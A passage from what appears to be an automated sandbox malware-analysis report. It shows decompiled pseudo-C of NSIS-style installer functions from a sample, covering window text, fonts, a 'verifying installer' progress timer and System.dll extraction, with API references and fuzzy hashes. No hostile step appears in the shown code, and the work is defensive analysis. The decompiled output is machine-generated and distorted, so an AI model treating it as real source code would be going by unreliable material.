				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x7a7a04;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x7a8af4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406281(_t38, 0, 0x7a0f00, 0x7a0f00, _a4);
					}
					_t27 = lstrlenW(0x7a0f00);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x7a79e8, 0x7a0f00);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7a0f00;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x7a0f00[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x7a0f00, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004052c9
0x004052d3
0x004052d8
0x004052de
0x004052e9
0x004052ec
0x004052ef
0x004052f5
0x004052f5
0x004052fb
0x00405303
0x00405306
0x00405323
0x00405327
0x00405330
0x00405330
0x0040533a
0x00405343
0x0040534f
0x00405356
0x0040535a
0x0040535d
0x00405370
0x0040537e
0x0040537e
0x00405382
0x00405384
0x00405387
0x00000000
0x00405387
0x00405308
0x00405310
0x00405318
0x0040531e
0x00000000
0x0040531e
0x00405318
0x00405306
0x00405393

APIs

lstrlenW.KERNEL32(007A0F00,00000000,007924D8,75ED23A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,75ED23A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 20aa65f000be929b1e11d1728d76fe9e6b564b96cf9baf0a42ebe1ff6a429860
Instruction ID: 54fc0906511a0d38b77c2dbc449d7618901aa97d03555d0a48212fe36839b6ac
Opcode Fuzzy Hash: 20aa65f000be929b1e11d1728d76fe9e6b564b96cf9baf0a42ebe1ff6a429860
Instruction Fuzzy Hash: A9218C71900618BACF11AFA6DD84EDFBF74EF85350F10807AF905B22A0C7794A40CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404B8D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404B8D(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404b9b
0x00404ba8
0x00404bae
0x00404bec
0x00404bec
0x00404bfb
0x00404c02
0x00000000
0x00404c04
0x00404bb0
0x00404bbf
0x00404bc7
0x00404bca
0x00404bdc
0x00404be2
0x00404be9
0x00000000
0x00404be9
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BA8
GetMessagePos.USER32 ref: 00404BB0
ScreenToClient.USER32(?,?), ref: 00404BCA
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BDC
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C02

Strings

f, xrefs: 00404BDE

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: 1a768e81d1a3c698b7e3ef6d626f5858b2063c99cedd32227338619671f62d57
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 18015E7190021CBADB00DB95DD85FFEBBBCAF95715F10412BBA50BA1D0C7B4AA058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401DB3(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C15(2);
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				0x40cdb0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40cdc0 = E00402C15(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				 *0x40cdc7 = 1;
				 *0x40cdc4 = _t15 & 0x00000001;
				 *0x40cdc5 = _t15 & 0x00000002;
				 *0x40cdc6 = _t15 & 0x00000004;
				E00406281(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x40cdb0);
				_push(_t18);
				_push(_t33);
				E004061A6();
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401db3
0x00401dbe
0x00401dc0
0x00401dcd
0x00401de4
0x00401de9
0x00401df6
0x00401dfb
0x00401dff
0x00401e0a
0x00401e11
0x00401e23
0x00401e29
0x00401e2e
0x00401e38
0x0040258c
0x0040156d
0x00402a65
0x00402ac2
0x00402ace

APIs

GetDC.USER32(?), ref: 00401DB6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
ReleaseDC.USER32(?,00000000), ref: 00401DE9
CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38

Strings

Calibri, xrefs: 00401E1E

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: 08381414c6e739f680c1a14db26c866ed95d6f562d15ae060e4ba8fd4e20cd39
Instruction ID: 4d28dda0b40ea0953a32cffe00044d8590db675546aa8caf17c1304664b83f42
Opcode Fuzzy Hash: 08381414c6e739f680c1a14db26c866ed95d6f562d15ae060e4ba8fd4e20cd39
Instruction Fuzzy Hash: 78017572954241EFE7006BB0AF8AB9A7FB4AF55301F10497EF241B71E2CA7800458F2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, "true", 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x78b6d4; // 0x89ba5
					_t11 =  *0x7976dc; // 0x8b410
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402de7
0x00402df5
0x00402dfb
0x00402dfb
0x00402e09
0x00402e0b
0x00402e11
0x00402e18
0x00402e1a
0x00402e1a
0x00402e30
0x00402e40
0x00402e52
0x00402e52
0x00402e5a

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DF5
MulDiv.KERNEL32(00089BA5,00000064,0008B410), ref: 00402E20
wsprintfW.USER32 ref: 00402E30
SetWindowTextW.USER32(?,?), ref: 00402E40
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52

Strings

verifying installer: %d%%, xrefs: 00402E2A

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3278fe65966c90afb4b572b20ee93d6781e748b995f18389883d07859a761d52
Instruction ID: c563a075df83d92fb310a5016e42997ab7e5782e6b78b1479044c0af3efb3f55
Opcode Fuzzy Hash: 3278fe65966c90afb4b572b20ee93d6781e748b995f18389883d07859a761d52
Instruction Fuzzy Hash: DE01677064020CBFDF149F50DD49FAA3B68AB00304F108039FA06F51D0DBB98965CF59

Uniqueness

Uniqueness Score: -1.00%

Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E100024A4(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}

0x100024ae
0x100024b0
0x100024bf
0x100024c5
0x100024d2
0x100024d4
0x100024d8
0x100024d8
0x100024e0
0x100024e6
0x100024e8
0x00000000
0x100024ef
0x00000000
0x00000000
0x100024f5
0x00000000
0x00000000
0x100024ff
0x00000000
0x00000000
0x10002506
0x1000250c
0x10002518
0x1000251e
0x10002523
0x00000000
0x00000000
0x10002545
0x00000000
0x00000000
0x1000252b
0x10002531
0x10002532
0x10002534
0x00000000
0x00000000
0x1000254d
0x1000254f
0x10002551
0x10002553
0x10002553
0x00000000
0x00000000
0x100024e8
0x10002556
0x10002556
0x1000255b
0x1000256d
0x1000256d
0x10002573
0x10002578
0x1000257d
0x10002589
0x1000258e
0x00000000
0x10002593
0x1000257f
0x10002580
0x10002594
0x10002594
0x1000257d
0x10002595
0x10002599
0x1000259c
0x100025b3

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 1000256D
GlobalFree.KERNEL32(00000000), ref: 100025A8

Memory Dump Source

Source File: 00000006.00000002.45232552637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.45232522122.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232596193.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232631278.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_hi38VYWujz.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004028A7(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C37(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E00405BA7(_t50) == 0) {
					E00402C37(0xffffffed);
				}
				E00405D2C(_t50);
				_t26 = E00405D51(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x7a8a38;
					 *(_t56 - 0x3c) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403308(_t45);
						E004032F2(_t49,  *(_t56 - 0x3c));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x4c) = _t54;
						if(_t54 != _t45) {
							_push( *(_t56 - 0x20));
							_push(_t54);
							_push(_t45);
							_push( *((intOrPtr*)(_t56 - 0x24)));
							E004030FA();
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405D0C( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x4c));
						}
						E00405E03( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
						GlobalFree(_t49);
						_push(_t45);
						_push(_t45);
						_push( *(_t56 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t56 - 0x30)) = E004030FA();
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004028a7
0x004028a9
0x004028b5
0x004028b8
0x004028c2
0x004028c6
0x004028c6
0x004028cc
0x004028d9
0x004028e1
0x004028e4
0x004028ea
0x004028f8
0x004028fd
0x00402901
0x00402904
0x0040290d
0x00402919
0x0040291d
0x00402920
0x00402922
0x00402925
0x00402926
0x00402927
0x0040292a
0x00402949
0x00402931
0x00402936
0x0040293e
0x00402941
0x00402946
0x00402946
0x00402950
0x00402950
0x0040295d
0x00402963
0x00402969
0x0040296a
0x0040296b
0x0040296e
0x00402975
0x00402975
0x0040297b
0x0040297b
0x00402986
0x00402987
0x0040298b
0x0040298f
0x00402995
0x00402995
0x0040299c
0x00402245
0x00402ac2
0x00402ace

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
GlobalFree.KERNEL32(?), ref: 00402950
GlobalFree.KERNEL32(00000000), ref: 00402963
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: c80f1b7699c573d2cd61cc0fc8ca34bd45e7fada534f6731a09c6b940c6eaf41
Instruction ID: bbedb4fc7ab5ed61472c20f64d7886a30c327f5f8cbd10d414b970b30e546654
Opcode Fuzzy Hash: c80f1b7699c573d2cd61cc0fc8ca34bd45e7fada534f6731a09c6b940c6eaf41
Instruction Fuzzy Hash: E021DDB1800128BBCF206FA5DE49D9E7E79EF08364F10423AF960762E0CB394D418F98

Uniqueness

Uniqueness Score: -1.00%

Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x4c) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
					} else {
						E00402C37(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nscDB19.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nscDB19.tmp\System.dll", 0x400, __ebx, __ebx);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nscDB19.tmp\System.dll");
					}
				} else {
					E00402C15("true");
					 *0x40ada8 = __ax;
					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E004061BF(_t27, _t32);
					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405E32(_t34, _t34) >= 0) {
						_t14 = E00405E03(_t34, "C:\Users\Arthur\AppData\Local\Temp\nscDB19.tmp\System.dll",  *(_t35 + 8));
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00402592
0x00402592
0x00402592
0x00402597
0x0040259a
0x0040259d
0x004025a2
0x004025a4
0x004025c4
0x00402602
0x004025c6
0x004025c8
0x004025e2
0x004025ed
0x004025ed
0x004025a6
0x004025a8
0x004025ad
0x004025bb
0x004025be
0x00402607
0x0040260a
0x00402885
0x00402885
0x00402610
0x00402619
0x0040261b
0x0040263a
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x0040261b
0x00402ac2
0x00402ace

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nscDB19.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nscDB19.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nscDB19.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nscDB19.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nscDB19.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED

Strings

C:\Users\user\AppData\Local\Temp\nscDB19.tmp, xrefs: 004025DB
C:\Users\user\AppData\Local\Temp\nscDB19.tmp\System.dll, xrefs: 004025AD, 004025D4, 004025E8, 00402634

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
